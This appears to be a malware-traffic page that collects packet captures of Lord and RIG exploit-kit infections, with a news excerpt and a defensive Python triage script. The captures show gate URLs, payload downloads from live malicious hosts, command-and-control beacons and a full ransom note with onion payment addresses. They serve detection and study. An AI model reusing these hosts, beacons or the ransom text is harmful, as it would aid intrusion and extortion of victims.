NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe's Flash Player, Malwarebytes security researchers say.

Dubbed “Lord,” the exploit kit (EK) was initially identified by Virus Bulletin's Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the landing page was rather rudimentary and served in clear text, but the toolkit operators quickly moved to obfuscate it.

The landing page has a function that checks for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability. One thing that sets the Lord EK apart from other toolkits is its use of the ngrok service to craft custom hostnames, which results in rather unusual URLs (the 7b2cdd48.ngrok.io host in the capture below). Source: https://www.securityweek.com/new-lord-exploit-kit-emerges
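As an added example (not code from the original page or from any tool named here), the script below parses the tcpdump -A style request lines and headers shown in these captures and flags the traits the summary calls out: the ngrok.io hostname Lord EK uses, plus the bare-IP Host header and the long opaque query string visible in the RIG gate requests further down. The sample input is constructed from a few of the page's own request blocks; the function names are my own.

```python
import re

# Constructed sample, patterned on three request blocks from the captures on
# this page (tcpdump -A summary line followed by the HTTP headers it carried).
SAMPLE = """\
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 7b2cdd48.ngrok.io
Connection: Keep-Alive

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA HTTP/1.1
Accept-Language: en-US
Host: 188.225.37.115
Connection: Keep-Alive

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
Host: gadistrictkiwanis.org
Connection: Keep-Alive
"""

# A tcpdump summary line that carries a decoded HTTP request line.
SUMMARY = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>[\d.]+)\.\d+ > (?P<dst>[\d.]+)\.\d+: .*HTTP: "
    r"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$"
)
HEADER = re.compile(r"^(?P<name>[A-Za-z0-9-]+): (?P<value>.*)$")
BARE_IP = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
# 40+ base64/URL-safe characters with no separator, as in the RIG gate URLs.
OPAQUE = re.compile(r"[A-Za-z0-9_\-=%]{40,}")


def parse_requests(text):
    """One dict per request (ts, src, dst, method, target, headers). Header
    lines are collected until the blank line that ends the block; any other
    line (tcpdump's raw byte residue) is ignored."""
    reqs, cur = [], None
    for line in text.splitlines():
        m = SUMMARY.match(line)
        if m:
            cur = m.groupdict()
            cur["headers"] = {}
            reqs.append(cur)
            continue
        if cur is None:
            continue
        h = HEADER.match(line)
        if h:
            cur["headers"][h["name"].lower()] = h["value"]
        elif not line.strip():
            cur = None
    return reqs


def flag_request(req):
    """Reasons a request deserves a look; an empty list means nothing matched."""
    reasons = []
    host = req["headers"].get("host", "")
    if host.endswith(".ngrok.io"):
        reasons.append("ngrok.io tunnel hostname (Lord EK trait)")
    if BARE_IP.fullmatch(host):
        reasons.append("Host header is a bare IP address")
    if OPAQUE.search(req["target"].partition("?")[2]):
        reasons.append("long opaque query string in request target")
    return reasons


def triage(text):
    """Map each flagged Host value to its reasons; unflagged hosts are omitted."""
    out = {}
    for req in parse_requests(text):
        reasons = flag_request(req)
        if reasons:
            out[req["headers"].get("host", "")] = reasons
    return out
```

Feeding the page's own capture text to `triage` (after stripping nothing; the parser skips the byte residue itself) surfaces the ngrok host and the RIG gate IP while leaving the compromised-site landing requests alone.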

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

RIG Exploit Kit EK Delivers LATENTBOT Malware APT 148.251.255.108 Trojan RAT PCAP file download traffic sample

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0

2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0
2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
CONTENT-LENGTH: 0

2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[….
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
CONTENT-TYPE: application/zip

2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK

2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
HTTP/1.1 200 OK
CONTENT-LENGTH: 16


POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45

Quant loader Ursnif malware from RIG Exploit Kit EK PCAP file download Traffic Analysis Sample

2016-10-25 11:46:51.191792 IP 192.168.2.50.49192 > 192.232.206.125.80: Flags [P.], seq 1:249, ack 1, win 16537, length 248: HTTP: GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: scadradio.org
Connection: Keep-Alive

2016-10-25 11:46:51.364390 IP 192.232.206.125.80 > 192.168.2.50.49192: Flags [.], ack 249, win 123, length 0

2016-10-25 11:46:56.365015 IP 192.168.2.50.49211 > 176.223.111.82.80: Flags [P.], seq 1:458, ack 1, win 16537, length 457: HTTP: GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://scadradio.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: po1289k.kremalopsi.gq
Connection: Keep-Alive

2016-10-25 11:47:23.483901 IP 192.168.2.50.49228 > 104.238.131.117.80: Flags [P.], seq 1:341, ack 1, win 16537, length 340: HTTP: GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: loremipsumdolorsitamet.pw
Connection: Keep-Alive

2016-10-25 11:47:23.601685 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [.], ack 341, win 980, length 0
2016-10-25 11:47:23.854582 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [P.], seq 1:347, ack 341, win 980, length 346: HTTP: HTTP/1.1 200 OK

2016-10-25 11:47:24.271842 IP 192.168.2.50.49229 > 82.165.174.205.80: Flags [P.], seq 1:310, ack 1, win 16537, length 309: HTTP: GET /img/381m6bv285.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: institut-angeetbeaute.fr
Connection: Keep-Alive

2016-10-25 11:47:24.484048 IP 82.165.174.205.80 > 192.168.2.50.49229: Flags [.], seq 1:1351, ack 310, win 516, length 1350: HTTP: HTTP/1.1 200 OK
Content-Type: application/octet-stream

2016-10-25 11:48:01.761117 IP 192.168.2.50.49230 > 46.30.215.31.80: Flags [P.], seq 1:110, ack 1, win 64800, length 109: HTTP: GET /micha/fsa/zj47dn49.iso HTTP/1.1
Host: gingapura.de
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 11:48:01.941251 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], ack 110, win 29200, length 0
2016-10-25 11:48:01.942021 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], seq 1:1301, ack 110, win 29200, length 1300: HTTP: HTTP/1.1 200 OK
Date: Tue, 25 Oct 2016 13:17:15 GMT

2016-10-25 11:48:21.713804 IP 192.168.2.50.49234 > 37.48.122.26.80: Flags [P.], seq 1:178, ack 1, win 16537, length 177: HTTP: GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0.0) Gecko/20100101 Firefox/40.0.0
Host: curlmyip.net
Connection: Keep-Alive
Cache-Control: no-cache

RIG Web-based Exploit Kit EK Exploits Flash and loads Ransomware Variant CryptMic Malware PCAP file download 91.121.74.154

2016-09-26 00:40:25.886473 IP 192.168.1.18.51426 > 5.196.126.167.80: Flags [P.], seq 1:512, ack 1, win 16475, length 511: HTTP: GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: chink12alzona.cyclemanagementassociates.info

2016-09-26 00:40:26.295112 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], ack 512, win 237, length 0
2016-09-26 00:40:27.640845 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], seq 1:1319, ack 512, win 237, length 1318: HTTP: HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2016 00:40:57 GMT
Content-Type: application/x-msdownload
Content-Length: 95232
Connection: keep-alive
Accept-Ranges: bytes

2016-09-26 00:40:31.356592 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [.], seq 9:1327, ack 19, win 257, length 1318
NOT YOUR LANGUAGE? USE https://translate.google.com

What happened to your files ?
All of your files were protected by a strong encryption with RSA4096
More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

How did this happen ?
!!! Specially for your PC was generated personal RSA4096 Key , both public and private.
!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

What do I do ?
So , there are two ways you can choose: wait for a _miracle_ and get _your_ PRICE DOUBLED! Or start obtaining *BITCOIN NOW! , and restore _YOUR_ _DATA_ easy way
If You have really valuable _DATA_, you better _NOT_ _WASTE_ _YOUR_ _TIME_, because there is _NO_ other way to get your files, except make a _PAYMENT_

Your personal ID: 2312323345345IDB23423423423445634dfg34ID

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:

1 – http://ccjlwb22w6c22p2k.onion.to
2 – http://ccjlwb22w6c22p2k.onion.city

If for some reasons the addresses are not available
2016-09-26 00:40:31.356709 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [P.], seq 1327:1668, ack 19, win 257, length 341
, follow these steps:

1 – Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2 – Video instruction: https://www.youtube.com/watch?v=NQrUZdsw2hA
3 – After a successful installation, run the browser
4 – Type in the address bar: http://ccjlwb22w6c22p2k.onion
5 – Follow the instructions on the site